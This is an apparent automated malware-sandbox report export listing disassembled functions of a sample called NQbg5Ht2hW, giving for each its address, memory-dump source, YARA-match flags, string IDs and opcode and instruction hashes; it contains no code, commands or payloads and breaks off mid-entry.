                                                                                                                                                                                                                                                                        • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                        • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                                                                                                                                                                                        Function 0073AEF7 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                        • Instruction ID: dfdc5620c09624bbe26e8d5e53306de097bb5731d8b01ca01d6faa4094a966e0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9D106B26083559FEB14CE24C891BAFBBD6AFC5310F09852DE99987382D739DD04C792
                                                                                                                                                                                                                                                                        Function 0042AC90 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                                        • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                                                                                                                                                                                                                                                        Function 00748A77 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: /,-
                                                                                                                                                                                                                                                                        • API String ID: 0-1700940157
                                                                                                                                                                                                                                                                        • Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                                        • Instruction ID: 9dd6bfa74182b7f4344a83cea33f4dc40a4646f28fbaf39e6c479d3829482b81
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0B1AA70B093489FD7648F24C881A3FB7A2EBD6324F18892CE59557281DB39EC05CB97
                                                                                                                                                                                                                                                                        Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: /,-
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-1700940157
                                                                                                                                                                                                                                                                        • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                                        • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                                                                                                                                                                                                                        Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: VtA
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3724035812
                                                                                                                                                                                                                                                                        • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                                        • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                                                                                                                                                                                                                        Function 0043DB60 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                                        • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                                                                                                                                                                                                                                                        Function 004252DD Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 9YB
                                                                                                                                                                                                                                                                        • API String ID: 0-659603884
                                                                                                                                                                                                                                                                        • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                                        • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                                                                                                                                                                                                                                                        Function 00718597 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                                        • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                        • Instruction ID: 70845cf30ec6aa4585378c356a0dfa3feb56a06bc3798567d0a6249556526573
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50912C71E043514BC751CE2DC8802DAB7E5AB81350F688A69D8D5DB3D2EA38DD818BC2
                                                                                                                                                                                                                                                                        Function 00408330 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                                        • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                        • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
                                                                                                                                                                                                                                                                        Function 00740BA7 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction ID: 30ca82cdcce1d0493916ebd13029359326d783108b0e68cd46b56da6f2fbe83f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC912827759A9047C31CAE7C4C622A6BA834BD7330B2DC77DAAB1CB3E5D67988054394
                                                                                                                                                                                                                                                                        Function 00430940 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                                                                                                                                                                                                                                                        Function 00716147 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction ID: b5ae1d296ea2915facd6d7ddd437bf4942c9e97856c0c64950f5c7544dc846d2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FB137702083859FC321CF5CC88065BBBE0AFA9304F544A2DE5D997382D635EA58CBA6
                                                                                                                                                                                                                                                                        Function 00405EE0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                                                                                                                                                                                                                                                        Function 00727806 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                                                        • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                        • Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                                        • Instruction ID: c6da04c5cd0472ce011a8a242121930f63aeecbf874b06e55c4fa3b077080af6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8716A72A182518BD328CF28DC55BABBBD6EBC1304F19C53DD481DB395DB789905C781
                                                                                                                                                                                                                                                                        Function 0073B3D7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction ID: 3995e9f3c9bb9fff91031e99cef6853dcc0ef57366a7185c19b4f302afde3589
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F571F632A083558BF724CE2CC48032EB7E2ABC5710F29C56DE6949B393D739DD458786
                                                                                                                                                                                                                                                                        Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                                                                                                                                                                                                                        Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: klm
                                                                                                                                                                                                                                                                        • API String ID: 0-3800403225
                                                                                                                                                                                                                                                                        • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                                        • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                                                                                                                                                                                                                                        Function 0072DAB8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: klm
                                                                                                                                                                                                                                                                        • API String ID: 0-3800403225
                                                                                                                                                                                                                                                                        • Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                                                                                                                                                                                                                        • Instruction ID: 46d6564e0d082846842ecba632e150b6726f3a16c551f302456654f8a04f6e11
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E51D3B450D3608BD724DF24C45276BB7F2EFA6308F14996CE4D58B290E7398901CB1A
                                                                                                                                                                                                                                                                        Function 004288CB Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: pF
                                                                                                                                                                                                                                                                        • API String ID: 0-4112324664
                                                                                                                                                                                                                                                                        • Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                                                                                                                                                                                        • Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
                                                                                                                                                                                                                                                                        Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: ?^A
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-4120214115
                                                                                                                                                                                                                                                                        • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                                                                                                                                                                                        • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
